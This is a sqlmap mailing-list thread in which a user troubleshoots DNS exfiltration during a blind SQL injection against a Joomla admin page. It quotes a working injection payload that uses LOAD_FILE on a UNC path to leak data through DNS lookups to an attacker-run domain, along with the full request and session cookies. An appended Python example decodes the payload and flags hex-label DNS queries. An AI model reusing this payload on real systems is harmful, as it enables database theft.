Re: [sqlmap-users] Problem with dns exfiltration
From: Miroslav S. <mir...@gm...> - 2014-01-23 07:42:40
Hi Chris.

It looks quite right. It would be tremendously helpful if you could send a console output and a tcpdump (you can limit to only port 53) for the following run:

sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."

From your given description it looks like everything should be up and running.

Kind regards,
Miroslav Stampar

On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...> wrote:
> Hey all,
>
> I've got a blind sqli that I'm exploiting with the latest sqlmap commit
> and am trying to get dns exfil to work, but am not having any luck.
>
> I start sqlmap as root with the --dns-domain option set to a domain that I
> control and have the sqlmap machine set as the authoritative NS for.
> Running with a -v6, this is the info I get:
>
> ===============================================
> [18:22:18] [INFO] testing for data retrieval through DNS channel
> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
> GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: gzip,deflate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
> Connection: close
>
> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
> Content-length: 8627
> Content-encoding: gzip
> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
> Expires: Mon, 1 Jan 2001 00:00:00 GMT
> Vary: Accept-Encoding
> Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> Server: Apache
> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
> Connection: close
> Pragma: no-cache
> Cache-control: post-check=0, pre-check=0
> Date: Wed, 22 Jan 2014 23:22:20 GMT
> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Content-type: text/html; charset=utf-8
>
> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
> ===============================================
>
> If I run a tcpdump on the sqlmap machine, I see dns requests come in for
> "target.net" and if I do manual dns queries to the domain I own, sqlmap
> responds as expected with localhost.domain.com.
>
> Any idea? Am I doing anything wrong?
>
> Chris

--
Miroslav Stampar
http://about.me/stamparm
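The quoted [PAYLOAD] line is the whole story of what sqlmap's DNS-channel test expects, and decoding it makes the troubleshooting easier to follow. The example below is added to this archive page and is not code from the thread or from sqlmap itself: it decodes the two hex literals in the payload to show the UNC path the database server is asked to LOAD_FILE(), extracts the hostname that path forces the server to resolve (the probe value 8315 hex-encoded as a label under the --dns-domain zone), and then applies the same label decoding from the resolver side as a small detector over constructed query names. The function names, the `example.net` zone and the sample query list are this example's own.

```python
"""Decode the DNS-channel probe quoted in the thread and detect hex-label
queries on the resolver side. Added example, not sqlmap code."""
import binascii
import re

# The two 0x... literals exactly as they appear in the quoted [PAYLOAD] line.
PREFIX_HEX = "5c5c5c5c4d776a2e"
SUFFIX_HEX = "2e79564e2e73656375726566696c652e6e65745c5c7456414c"
# The payload hex-encodes CAST(8315 AS CHAR); HEX('8315') is this label.
PROBE_HEX = "38333135"

# A label of 8+ hex digits is the shape a hex-encoded data chunk takes.
HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")


def decode_mysql_hex(literal):
    """Turn a MySQL hex literal (with or without the 0x prefix) into text."""
    literal = literal.lower()
    if literal.startswith("0x"):
        literal = literal[2:]
    return binascii.unhexlify(literal).decode("latin-1")


def unc_hostname(unc_path):
    """Return the host part of a UNC path (\\\\host\\share), or None.
    LOAD_FILE() on such a path makes the server look that host up."""
    m = re.match(r"^\\+([^\\]+)\\", unc_path)
    return m.group(1) if m else None


def reconstruct_lookup_name():
    """The name the target's database server must resolve for the quoted probe."""
    path = decode_mysql_hex(PREFIX_HEX) + PROBE_HEX + decode_mysql_hex(SUFFIX_HEX)
    return unc_hostname(path)


def classify_query(qname, zone):
    """Resolver-side check: if `qname` sits under `zone` and carries a
    hex-encoded label, return the decoded bytes, else None."""
    zone = zone.lower().rstrip(".")
    name = qname.lower().rstrip(".")
    if not name.endswith("." + zone):
        return None
    for label in name[: -len(zone) - 1].split("."):
        if HEX_LABEL.match(label) and len(label) % 2 == 0:
            return binascii.unhexlify(label)
    return None


def flagged_queries(qnames, zone):
    """Return [(qname, decoded_bytes)] for every query carrying a hex label."""
    out = []
    for q in qnames:
        decoded = classify_query(q, zone)
        if decoded is not None:
            out.append((q, decoded))
    return out


# Constructed query names for a zone this example owns; not from the thread.
SAMPLE_QNAMES = [
    "www.example.net",
    "ns1.example.net",
    "abc.deadbeef.example.net",
    "mail.example.net",
]

if __name__ == "__main__":
    print("probe lookup name:", reconstruct_lookup_name())
    for qname, data in flagged_queries(SAMPLE_QNAMES, "example.net"):
        print("hex label in", qname, "->", data)
```

Two details worth noticing when reading the decoded name. The data chunk is MID(..., 1, 31): 31 bytes become 62 hex digits, which fits the 63-octet maximum length of a single DNS label, so each query carries one chunk. And in the thread the queries reaching tcpdump are for "target.net" rather than for names of this shape under the --dns-domain zone, which is exactly what the console output and port-53 capture Miroslav asks for would confirm. The hex-label heuristic is a triage signal, not a verdict: content-addressed hostnames (CDN nodes, hashed labels) match it too, so pair it with the zone check and query volume before alerting.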